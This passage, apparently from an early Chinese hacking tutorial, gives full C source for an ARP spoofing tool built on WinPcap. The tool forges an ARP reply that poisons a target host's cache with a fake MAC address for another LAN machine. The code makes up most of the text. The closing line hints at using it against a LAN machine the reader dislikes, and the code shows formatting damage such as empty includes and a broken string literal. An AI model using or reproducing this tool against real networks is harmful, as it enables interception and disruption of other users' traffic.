我们来实现这样的ARP欺骗。这里需要使用一个WinPcap提供的API和驱动。（http://winpcap.polito.it/）

winpcap是一个伟大而且开放的项目。Windows环境下的nmap、snort、windump都是使用的winpcap。

///////////////////////////////////////////////////////

//

// ARP Sender

//

// Creator: Refdom

// Email: refdom@263.net

// Home Page: www.opengram.com

//

// 2002/4/7

//

///////////////////////////////////////////////////////

#include "stdafx.h"

#include "Mac.h"

//GetMacAddr()，我写的把字符串转换为MAC地址的函数，就不列在这里了

#include

#include

#define EPT_IP0x0800/* type: IP*/

#define EPT_ARP0x0806/* type: ARP */

#define EPT_RARP0x8035/* type: RARP */

#define ARP_HARDWARE 0x0001/* Dummy type for 802.3 frames */

#defineARP_REQUEST0x0001/* ARP request */

#defineARP_REPLY0x0002/* ARP reply */

#define Max_Num_Adapter 10

#pragma pack(push, 1)

typedef struct ehhdr

{

unsigned chareh_dst[6];/* destination ethernet addrress */

unsigned chareh_src[6];/* source ethernet addresss */

unsigned shorteh_type;/* ethernet pachet type*/

}EHHDR, *PEHHDR;

typedef struct arphdr

{

unsigned shortarp_hrd;/* format of hardware address */

unsigned shortarp_pro;/* format of protocol address */

unsigned chararp_hln;/* length of hardware address */

unsigned chararp_pln;/* length of protocol address */

unsigned shortarp_op;/* ARP/RARP operation */

unsigned chararp_sha[6];/* sender hardware address */

unsigned longarp_spa;/* sender protocol address */

unsigned chararp_tha[6];/* target hardware address */

unsigned longarp_tpa;/* target protocol address */

}ARPHDR, *PARPHDR;

typedef struct arpPacket

{

EHHDRehhdr;

ARPHDRarphdr;

} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

int main(int argc, char* argv[])

{

static char AdapterList[Max_Num_Adapter][1024];

char szPacketBuf[600];

char MacAddr[6];

LPADAPTERlpAdapter;

LPPACKETlpPacket;

WCHARAdapterName[2048];

WCHAR*temp,*temp1;

ARPPACKET ARPPacket;

ULONG AdapterLength = 1024;

int AdapterNum = 0;

int nRetCode, i;

//Get The list of Adapter

if(PacketGetAdapterNames((char*)AdapterName,&AdapterLength)==FALSE)

{

printf("Unable to retrieve the list of the adapters!\n");

return 0;

}

temp = AdapterName;

temp1=AdapterName;

i = 0;

while ((*temp != ''\0'')||(*(temp-1) != ''\0''))

{

if (*temp == ''\0'')

{

memcpy(AdapterList[i],temp1,(temp-temp1)*2);

temp1=temp+1;

i++;

}

temp++;

}

AdapterNum = i;

for (i = 0; i < AdapterNum; i++)

wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);

printf("\n");

//Default open the 0

lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]);

//取第一个网卡（假设啦）

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))

{

nRetCode = GetLastError();

printf("Unable to open the driver, Error Code : %lx\n", nRetCode);

return 0;

}

lpPacket = PacketAllocatePacket();

if(lpPacket == NULL)

{

printf("\nError:failed to allocate the LPPACKET structure.");

return 0;

}

ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))

{

printf ("Get Mac address error!\n");

}

memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //源MAC地址

if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //目的MAC地址。（A的地址）

ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);

ARPPacket.arphdr.arp_pro = htons(EPT_IP);

ARPPacket.arphdr.arp_hln = 6;

ARPPacket.arphdr.arp_pln = 4;

ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);//伪造的C的MAC地址

ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); //C的IP地址

if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))

{

printf ("Get Mac address error!\n");

return 0;

}

memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); //目标A的MAC地址

ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); //目标A的IP地址

memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));

PacketInitPacket(lpPacket, szPacketBuf, 60);

if(PacketSetNumWrites(lpAdapter, 2)==FALSE)

{

printf("warning: Unable to send more than one packet in

a single write!\n");

}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)

{

printf("Error sending the packets!\n");

return 0;

}

printf ("Send ok!\n");

// close the adapter and exit

PacketFreePacket(lpPacket);

PacketCloseAdapter(lpAdapter);

return 0;

}

于是A接收到一个被伪造的ARP应答。A被欺骗了！！倘若在局域网中看某某机器不顺眼，……